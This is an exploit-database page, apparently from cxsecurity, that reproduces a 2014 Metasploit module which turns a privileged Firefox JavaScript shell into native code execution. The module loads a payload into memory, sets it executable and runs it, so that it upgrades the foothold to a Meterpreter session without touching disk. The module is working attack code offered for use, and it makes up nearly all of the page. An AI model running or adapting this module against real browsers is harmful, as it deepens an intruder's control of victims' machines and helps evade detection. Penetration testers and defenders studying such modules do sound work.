Firefox Exec Shellcode From Privileged Javascript Shell

2014.03.14
Credit: joev
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/payload/firefox' class Metasploit3 < Msf::Exploit::Local include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info={}) super(update_info(info, 'Name' => 'Firefox Exec Shellcode from Privileged Javascript Shell', 'Description' => %q{ Allows execution of native payloads from a privileged Firefox Javascript shell. Puts the specified payload into memory, adds the necessary protection flags, and calls it. Useful for upgrading a Firefox javascript shell to a Meterpreter session without touching the disk. }, 'License' => MSF_LICENSE, 'Author' => [ 'joev' ], 'Platform' => [ 'firefox' ], 'DisclosureDate' => 'Mar 10 2014', 'Targets' => [ [ 'Native Payload', { 'Platform' => %w{ linux osx win unix }, 'Arch' => ARCH_ALL } ] ], 'DefaultTarget' => 0 )) register_options([ OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90]) ], self.class) end def exploit session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]") results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) print_warning(results) if results.present? end def js_payload %Q| (function(send){ try { #{run_payload} send("Payload executed."); } catch (e) { send(e); } })(send); |.strip end end


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top